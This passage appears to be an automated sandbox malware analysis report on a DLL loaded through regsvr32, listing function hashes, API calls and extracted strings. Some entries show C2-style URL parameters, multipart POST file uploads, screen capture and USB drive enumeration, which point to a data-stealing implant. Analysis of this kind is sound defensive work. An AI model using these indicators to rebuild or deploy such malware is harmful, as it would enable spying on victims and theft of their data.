                                                                                                                • Opcode Fuzzy Hash: 092f86bd6f5588a0361e8f0b995989dfb593956ac1ba0dd867d5b9bfca474b8e
                                                                                                                • Instruction Fuzzy Hash: D0116262A2864181EA61DFE19400B7DA264BB55B84FCC4039EB4EF7786CEBDF54AC740
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.14%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                • String ID:
                                                                                                                • API String ID: 3215553584-0
                                                                                                                • Opcode ID: 69c0246e260bdb653590928fd4eed2362b1d82414a1d70ae38570950e5dc5001
                                                                                                                • Instruction ID: 3fe97c6080e77204e1255be8e7a0f7d992ef640c2bac5e2050a5a7705927d0f7
                                                                                                                • Opcode Fuzzy Hash: 69c0246e260bdb653590928fd4eed2362b1d82414a1d70ae38570950e5dc5001
                                                                                                                • Instruction Fuzzy Hash: 8C1181B191A65283E310CB54A480B297361FB40740F9D1138E65EE7792DFBCF816C700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.14%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 08a0083a2ecba2dbbb083b270186ed0c5750a5b595065498c73e79f8854996af
                                                                                                                • Instruction ID: b2fa0509686c06df605ec9918e42e5b820bd65edb55b38aeb7ac2bcce9a1d6fc
                                                                                                                • Opcode Fuzzy Hash: 08a0083a2ecba2dbbb083b270186ed0c5750a5b595065498c73e79f8854996af
                                                                                                                • Instruction Fuzzy Hash: 8D1190F291864292D651DF90D5407AD7760FB81750FD8423AE24EA63DACFBCF00AC740
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                • String ID:
                                                                                                                • API String ID: 3215553584-0
                                                                                                                • Opcode ID: 08d78ef2bf650b68f1d6e1c73591310f35e4781cab247b4edca797da1a237e67
                                                                                                                • Instruction ID: 44ae49944c7254c61ce413fb6bcf2a59ffd4eea5954772bd095d004f640b514f
                                                                                                                • Opcode Fuzzy Hash: 08d78ef2bf650b68f1d6e1c73591310f35e4781cab247b4edca797da1a237e67
                                                                                                                • Instruction Fuzzy Hash: 620184A1E2861242FE14EAF59411BB91150BF85764F9D1738E92BE73C3CEACF40BC640
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.14%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                • String ID:
                                                                                                                • API String ID: 3215553584-0
                                                                                                                • Opcode ID: fa9f582d3ef518a7e2dae39603b05c661a4188fc51b27e780d0270c7b83ce9d8
                                                                                                                • Instruction ID: 451df310677f886168dbde6f3091477b78f6042d2d72190ac1550bbf418b3e47
                                                                                                                • Opcode Fuzzy Hash: fa9f582d3ef518a7e2dae39603b05c661a4188fc51b27e780d0270c7b83ce9d8
                                                                                                                • Instruction Fuzzy Hash: FB015EB2A10B1688EB10CFB0D4409EC37B8FB14748F981539DA5E63748EF78E56AC380
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.14%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: ba3a96c6be64c61bf5b9ffe285a84d2b3357c14f202822a48d9c967e456284f5
                                                                                                                • Instruction ID: 3a39c8949cd0e81c45351022692cb2b82c11e276649d98d82143b02661a31d95
                                                                                                                • Opcode Fuzzy Hash: ba3a96c6be64c61bf5b9ffe285a84d2b3357c14f202822a48d9c967e456284f5
                                                                                                                • Instruction Fuzzy Hash: 2DF04FC4B1A60682FE55DBE55461BB422867F48B50FCC5438C90FE63D1DEACF54EC210
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                • String ID:
                                                                                                                • API String ID: 3215553584-0
                                                                                                                • Opcode ID: a8e3651083c22e3107b72cc62ebed50ebdb98978f2f65936c9157084e21fbae8
                                                                                                                • Instruction ID: ab68e9e7d26221b619b1f2dc613787d896e0310047eed491c87d147cb9953043
                                                                                                                • Opcode Fuzzy Hash: a8e3651083c22e3107b72cc62ebed50ebdb98978f2f65936c9157084e21fbae8
                                                                                                                • Instruction Fuzzy Hash: 26F06DA196C14281E914F6F5A401B782190BF42790F9C1538EA1BA7392CEACF41BC600
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.14%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: 7a3b6817eee3cc6754ee54bc445c6780e79a2348bdcbc92d6ee40dbd48a91ed0
                                                                                                                • Instruction ID: 26478b6c998f446309b4c869ba3ec650069008eae3236fc0234db9cde5b3ec71
                                                                                                                • Opcode Fuzzy Hash: 7a3b6817eee3cc6754ee54bc445c6780e79a2348bdcbc92d6ee40dbd48a91ed0
                                                                                                                • Instruction Fuzzy Hash: 07F05E81A0820646FAA5EBF15851B786281BF44761FCC6A3CDC2FE62C1DEACF44AC210
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                • String ID:
                                                                                                                • API String ID: 3215553584-0
                                                                                                                • Opcode ID: f402763c22ccb898a0f4fc31ecae900f844cef02781451b61ed9772d7cad1840
                                                                                                                • Instruction ID: 0302c115d9cd5e4e74fd5116648f79c4eca55de389bdf67348fb32940c2e565a
                                                                                                                • Opcode Fuzzy Hash: f402763c22ccb898a0f4fc31ecae900f844cef02781451b61ed9772d7cad1840
                                                                                                                • Instruction Fuzzy Hash: 32F089A171574245EA55DBF690C1E7821507F48784FD84038DB4E97342DD7CF45BC700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.14%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: __scrt_dllmain_crt_thread_attach
                                                                                                                • String ID:
                                                                                                                • API String ID: 2860701742-0
                                                                                                                • Opcode ID: 84af8402ecc19af6f2d6efd1b40a71a451edfddafdc168391739db53c4d94e2a
                                                                                                                • Instruction ID: 34c6a2ba34b8f2261454a6dcf19111089759e5c5bdafd57366f06a73b5db075f
                                                                                                                • Opcode Fuzzy Hash: 84af8402ecc19af6f2d6efd1b40a71a451edfddafdc168391739db53c4d94e2a
                                                                                                                • Instruction Fuzzy Hash: C1E0C2D0A0E28656FE66A6E11092FB926502F19340FDC107DD8AFEA2C3CD9D748DA525
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 53bbb5074b4280db1a3f0350cff8a4f646f747dda344e20905b66219f420af91
                                                                                                                • Instruction ID: ed3849800714f6a19689f27d762f1eb48d151896e2bf9c06ed0ee43257404bdf
                                                                                                                • Opcode Fuzzy Hash: 53bbb5074b4280db1a3f0350cff8a4f646f747dda344e20905b66219f420af91
                                                                                                                • Instruction Fuzzy Hash: BFD06CC0EAA58A40FE65A2F28421BB502C42F19770E9D13389C3FE92D3EDACF44EC111
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.00%

                                                                                                                Non-executed Functions

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$ByteCharMultiWide$HttpRequest$Internet$CloseHandleHeaders$ErrorFileLastOpenSendWrite
                                                                                                                • String ID: Content-Disposition: form-data; name="binary"; filename="$"Content-Type: application/octet-stream$--$8817a87579e4dcadedcbc9a460d07dfbc5bd6f7366ee53d109ec1591d95e4adf334b9492cb61e964b843a4306b9bb123c5e478366ff3198044af27f3e35f47eb06$@$Content-Length: %d$Content-Type: multipart/form-data; boundary=$POST$ad2de2fb3332e182a27c17bfea9e98068080559c99981bac3921008e05f80430aae338fba9af7bcd091635b26cc564579cd406cccfcb4ef9
                                                                                                                • API String ID: 4142242795-1288420633
                                                                                                                • Opcode ID: c789a802d83bd6cc0ea92f9da95b31eb10943db1e83d74b512ac8aa031e7db52
                                                                                                                • Instruction ID: 4805442308d420b7eb44cfb8dbbe32531b6f2eb1c8f4601868b5f7c5406e6387
                                                                                                                • Opcode Fuzzy Hash: c789a802d83bd6cc0ea92f9da95b31eb10943db1e83d74b512ac8aa031e7db52
                                                                                                                • Instruction Fuzzy Hash: 62B2D5B2A187C185EB10CFA4E544BED3365FB44798F844239EA9E57A99DFBCE184C300
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$FileRead$CloseHandle$CreateInternetThread$Concurrency::cancel_current_taskConnectOpenSleep
                                                                                                                • String ID: /?m=c&p1=$/?m=d&p1=$004c30a9e3b7f47670b363323299a849251a05931d97025252d08e99d867bfc4f990d35791558c8cd919544315$076bf1dc1c002df98f90329224a226012927b807$213c047b04d010be7d6d5daba9287cdb0f472e25$86049a6c9cf6dfc80dc0375b2047e014b49e34$E
                                                                                                                • API String ID: 1623615363-2406579667
                                                                                                                • Opcode ID: cb45c2e631ca1b84f00b813f1d2cf3c5d098d099c4a6c6033a1899f85df109d3
                                                                                                                • Instruction ID: 7b20cc3b0d57576791469fb719002f79b58fc65406b39148423d682d545e2b6a
                                                                                                                • Opcode Fuzzy Hash: cb45c2e631ca1b84f00b813f1d2cf3c5d098d099c4a6c6033a1899f85df109d3
                                                                                                                • Instruction Fuzzy Hash: BCB285A2B147C185EF10DFA4D4847AD2361FB45798F845239EA5E57AEADFBCE188C300
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$ByteCharMultiWide$CloseConcurrency::cancel_current_taskFileHandleWrite
                                                                                                                • String ID: &p2=a$/?m=b&p1=$076bf1dc1c002df98f90329224a226012927b807$213c047b04d010be7d6d5daba9287cdb0f472e25$>> $c342b11d0cbf3e0eec1b60c6fc0e2906edd50d60
                                                                                                                • API String ID: 2839222787-2954172010
                                                                                                                • Opcode ID: e0ae9c5b5367eb30eb075a24ed598a44806f3f063c86762f5fa222ecc17fcfb1
                                                                                                                • Instruction ID: eda3c256cb167e71acd076495765f1b99afa8eb2ea5f226449261e86f40fff64
                                                                                                                • Opcode Fuzzy Hash: e0ae9c5b5367eb30eb075a24ed598a44806f3f063c86762f5fa222ecc17fcfb1
                                                                                                                • Instruction Fuzzy Hash: 88A272A2A14BC185EB10DFB4D844BED23A2FB457A8F944235DA5D57AD9DFBCE188C300
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Object$ByteCharCompatibleCreateDeleteMetricsMultiSelectSystemWide$AddressBitmapBitsCloseDesktopFileHandleLibraryLoadProcReleaseWindowWrite
                                                                                                                • String ID: $02653bab1f35986a8b86ed639bde47cd51511ee588d22926de2b82b163fccc601010$8d46c7d496e1e218f9001141c009116bd8ed4fe94c9f532fbad6
                                                                                                                • API String ID: 3909023660-2445533521
                                                                                                                • Opcode ID: d1ed1a026df6f0a87cdb0bfe80f6df98f9186325df7c44553f35765557ad7e39
                                                                                                                • Instruction ID: b87ebe2266a578c266212ce5dfc452fd0698cd99c1611620d157b1f4178028a0
                                                                                                                • Opcode Fuzzy Hash: d1ed1a026df6f0a87cdb0bfe80f6df98f9186325df7c44553f35765557ad7e39
                                                                                                                • Instruction Fuzzy Hash: 40F1F6A2A146C186EB11CF65E8447AD33A5FB45794F844239DE0E97BD9DFBCE248C300
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: memcpy_s$_invalid_parameter_noinfo
                                                                                                                • String ID:
                                                                                                                • API String ID: 2880407647-3916222277
                                                                                                                • Opcode ID: d8598b664ca96503437032bf4b57bfa9348ec0fc7046af409510203917353114
                                                                                                                • Instruction ID: d00baea76489f9255bbf67fa5e4fad7fa0cc474cea22de710415c398eb0c4781
                                                                                                                • Opcode Fuzzy Hash: d8598b664ca96503437032bf4b57bfa9348ec0fc7046af409510203917353114
                                                                                                                • Instruction Fuzzy Hash: 0003C4B2A241928ED775CE74D440FF93795FB84788F885139DA0BABB44DB7CAA09C740
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Internet$CloseHandle$Http$FileOpenRequest$ConnectErrorInfoLastQueryReadSendWrite
                                                                                                                • String ID: 8817a87579e4dcadedcbc9a460d07dfbc5bd6f7366ee53d109ec1591d95e4adf334b9492cb61e964b843a4306b9bb123c5e478366ff3198044af27f3e35f47eb06$HTTP/1.1$POST
                                                                                                                • API String ID: 2464402415-3540460043
                                                                                                                • Opcode ID: b64f36e83008693a90338a4975157558bef2375a4d98157205b117e58c956d3a
                                                                                                                • Instruction ID: 216ea29dff884f0148d5f1e4e0946e59da342beafadcc1c4196733dbdd8c3fc3
                                                                                                                • Opcode Fuzzy Hash: b64f36e83008693a90338a4975157558bef2375a4d98157205b117e58c956d3a
                                                                                                                • Instruction Fuzzy Hash: 8FD119B2A1868281EB20DF95E454F6E7365FB84794FC44139DA8E97B95DFBCE048C700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Device$Setup$CloseControlDetailHandleInterface$00007A922ClassDestroyDevsDriveEnumInfoInformationInterfacesListQueryTypeVolume
                                                                                                                • String ID: USB\$\Floppy
                                                                                                                • API String ID: 1516414671-497063568
                                                                                                                • Opcode ID: 70505352b08a9f918e3a3ad35f537230caff135ce23aa4ca6b87e56227af6aaa
                                                                                                                • Instruction ID: be188a47054b9bd862466a233c1c916498a41e7ba4ee8ece76c9cad00569aef5
                                                                                                                • Opcode Fuzzy Hash: 70505352b08a9f918e3a3ad35f537230caff135ce23aa4ca6b87e56227af6aaa
                                                                                                                • Instruction Fuzzy Hash: 3CC19472A18B4286E760CFA5E840FA97774FB48758F880139DA5EA3B94DF7CE549C700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
